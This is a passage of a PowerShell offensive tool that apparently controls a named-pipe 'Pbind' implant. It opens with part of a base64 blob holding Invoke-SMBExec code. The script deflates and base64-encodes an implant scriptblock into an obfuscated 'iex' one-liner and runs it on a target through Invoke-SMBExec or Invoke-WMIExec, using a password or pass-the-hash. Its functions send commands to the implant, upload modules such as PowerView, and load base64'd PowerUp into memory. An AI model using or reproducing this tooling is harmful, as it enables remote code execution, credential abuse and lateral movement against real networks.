Y29kaW5nXTo6VW5pY29kZS5HZXRCeXRlcygkUGFzc3dvcmQpKQ0KICAgIFdyaXRlLU91dHB1dCAiSGFzaCBiZWluZyB1c2VkOiAkSGFzaCINCn0NCg0KaWYoJENvbW1hbmQpDQp7DQogICAgJFNNQl9leGVjdXRlID0gJHRydWUNCn0NCg0KaWYoJFNNQjEpDQp7DQogICAgJFNNQl92ZXJzaW9uID0gJ1NNQjEnDQp9DQoNCmZ1bmN0aW9uIENvbnZlcnRGcm9tLVBhY2tldE9yZGVyZWREaWN0aW9uYXJ5DQp7DQogICAgcGFyYW0oJHBhY2tldF9vcmRlcmVkX2RpY3Rpb25hcnkpDQoNCiAgICBGb3JFYWNoKCRmaWVsZCBpbiAkcGFja2V0X29yZGVyZWRfZGljdGlvbmFyeS5WYWx1ZXMpDQogICAgew0KICAgICAgICAkYnl0ZV9hcnJheSArPSAkZmllbGQNCiAgICB9DQoNCiAgICByZXR1cm4gJGJ5dGVfYXJyYXkNCn0NCg0KI05ldEJJT1MNCg0
KZnVuY3Rpb24gR2V0LVBhY2tldE5ldEJJT1NTZXNzaW9uU2VydmljZSgpDQp7DQogICAgcGFyYW0oW0ludF0kcGFja2V
# Convert server scriptblock to base64 with compression
$ScriptBytes = ( [ Text.Encoding ] :: ASCII ) . GetBytes ( $s_scriptblock )
$CompressedStream = New-Object IO . MemoryStream
$DeflateStream = New-Object IO . Compression . DeflateStream ( $CompressedStream , [ IO.Compression.CompressionMode ] :: Compress )
$DeflateStream . Write ( $ScriptBytes , 0 , $ScriptBytes . Length )
$DeflateStream . Dispose ( )
$CompressedScriptBytes = $CompressedStream . ToArray ( )
$CompressedStream . Dispose ( )
$EncodedCompressedScript = [ Convert ] :: ToBase64String ( $CompressedScriptBytes )
$NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + " ' $EncodedCompressedScript ' " + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
$payload = " cmd /c powershell -exec bypass -c `" `" $NewScript `" `" "
if ( $hash . ispresent ) {
if ( $domain -eq " . " ) {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $target \ $user2 " , " $Password2 " )
} else {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $domain2 \ $user2 " , " $Password2 " )
}
}
else {
if ( $domain -eq " . " ) {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $target \ $user " , " $Password " )
} else {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $domain \ $user " , " $Password " )
}
}
# if psexec
if ( $PSexec . IsPresent ) {
$smbexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $smbexec ) )
IEX $smbexecw
echo " `n [+] Running Invoke-SMBExec with the supplied credentials "
if ( $hash ) {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $user `" -Hash `" $hash `" -Command `" $payload `" "
} else {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $user `" -Password `" $password `" -Command `" $payload `" "
}
$success = IEX $smbcmd
$success
} else {
$wmiexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $wmiexec ) )
IEX $wmiexecw
echo " `n [+] Running Invoke-WMIExec with the supplied credentials "
if ( $password ) {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $user `" -Password `" $password `" -Command `" $payload `" "
} else {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $user `" -Hash `" $hash `" -Command `" $payload `" "
}
$success = IEX $wmicmd
$success
}
$PIPE_runspace = [ RunspaceFactory ] :: CreateRunspace ( )
$PIPE_runspace . Open ( )
$PIPE_runspace . SessionStateProxy . SetVariable ( 'pipestate' , $pipestate )
$PIPE_powershell = [ PowerShell ] :: Create ( )
$PIPE_powershell . Runspace = $PIPE_runspace
$PIPE_powershell . AddScript ( $c_scriptblock ) > $null
$PIPE_powershell . BeginInvoke ( ) > $null
echo " "
$endtime = ( Get-Date ) . AddMilliseconds ( $timeout )
while ( ( Get-Date ) -lt $endtime ) {
if ( $pipestate . state -eq $true )
{ break }
#echo $pipestate.state
}
if ( $pipestate . state -eq $True ) {
echo " Connected: $target - $pname "
echo " "
}
elseif ( ( get-date ) -lt $endtime ) {
echo " Not Connected: Timeout occured "
}
else {
echo " Not Connected: :-( "
}
}
}
function Pbind-Command ( $command ) {
<#
. SYNOPSIS
Used to interact with the implant and send basic commands .
. EXAMPLE
PS C: \ > Pbind-Command ipconfig
. DESCRIPTION
Runs ipconfig on the target endpoint and returns the output . See pbind scripts to execute more advanced powershell .
#>
if ( $pipestate . state -eq $true ) {
$script:pipestate . log = $null
echo " "
echo " [+] Sending command: $command "
echo " "
$script:pipestate . command = $command
while ( $pipestate . log -eq $null ) { }
$output = $pipestate . log -replace '123456(.+?)654321' , ''
$output
}
else {
echo " Not Connected: Command Not Sent "
}
}
function Pbind-module ( $command ) {
<#
. SYNOPSIS
Used to upload modules to the implant .
. EXAMPLE
PS C: \ > Pbind-module " c:\modules folder\powerview.ps1 "
. DESCRIPTION
Reads in a ps1 file into the implant , will execute if auto run configured .
Use pbind-module to run functions loaded in memory (this is all done local to where the implant is run and does not work well with a C2 - see command scripts for a better use case in a C2).
#>
if ( $pipestate . state -eq $true ) {
$pipestate . log = $null
echo " "
echo " [+] Loading Module $command "
echo " "
$mod = " $command "
#echo "collecting module $command"
$content = [ IO.File ] :: ReadAllText ( $mod )
$script:pipestate . command = $content
while ( $pipestate . log -eq $null ) { }
$output = $pipestate . log -replace '123456(.+?)654321' , ''
$output }
else {
echo " Not Connected: Command Not Sent "
}
}
function Pbind-Kill ( $command ) {
<#
. SYNOPSIS
Used to kill the implant on the target .
. EXAMPLE
PS C: \ > Pbind-Kill
. DESCRIPTION
Destroys Pipe on target
#>
if ( $pipestate . state -eq $true ) {
echo " "
" [-] Killing pipe "
$script:pipestate . state = $false
$script:pipestate . command = " KILLPIPE "
echo " "
}
else {
echo " Not Connected: Command Not Send "
}
}
function Pbind-squirt ( $command ) {
<#
. SYNOPSIS
Used to squirt modules into memory , only works with pre-configured modules such as powerup ( already bundled )
. EXAMPLE
PS C: \ > Pbind-squirt powerup
. DESCRIPTION
Loads base64'd modules into the implant; they will execute if auto run is configured. Use pbind-command to run functions loaded in memory.
#>
$powerup = " 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
if ( $pipestate . state -eq $true ) {
$pipestate . log = $null
echo " "
echo " [+] Squirting Module "
echo " "
if ( $command -eq " powerup " ) {
$smodbase = $powerup }
$smod = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $smodbase ) )
$script:pipestate . command = " squirtmodule $smod "
#echo $pipestate.command
while ( $pipestate . log -eq $null ) { }
$output = $pipestate . log -replace '123456(.+?)654321' , ''
$output }
else {
echo " Not Connected: Command Not Sent "
}
}